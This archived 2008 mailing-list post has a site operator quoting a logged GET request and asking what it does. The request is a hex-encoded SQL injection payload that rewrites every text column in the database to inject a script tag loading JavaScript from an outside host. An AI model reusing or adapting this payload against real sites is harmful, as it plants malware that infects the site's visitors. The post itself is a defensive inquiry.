- From: Adrian Walker <adriandwalker@gmail.com>
- Date: Fri, 15 Aug 2008 13:42:12 -0400
- To: semantic_web@googlegroups.com, SW-forum <semantic-web@w3.org>, semanticweb@yahoogroups.com, "[ontolog-forum]" <ontolog-forum@ontolog.cim3.net>
- Message-ID: <1e89d6a40808151042s1218466ua66417ad160466fb@mail.gmail.com>
Hi All -- Your expert advice please. On our website [1], we support a kind of Wiki for business rules and facts, written in executable English. The site can also be used as an SOA endpoint. One of the sets of rules and facts on the site is a version of the FeaReferenceModelOntology. We are seeing incoming GET commands like the one listed below. [15/Aug/2008:13:10:57 -0400] "GET /demo_agents/FeaReferenceModelOntology2.agent?;DeCLARE%20@S %20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 620290 The commands originate from many different sites around the internet, and we have not been able to find out why they are being sent. Does anyone know please what these commands are trying to do? Or are they simply buffer overflow attack attempts? Thanks for your kind thoughts about this, and apologies for cross posting. -- Adrian [1] Internet Business Logic A Wiki and SOA Endpoint for Executable Open Vocabulary English over SQL and RDF Online at www.reengineeringllc.com Shared use is free Adrian Walker Reengineering
Received on Friday, 15 August 2008 17:42:49 UTC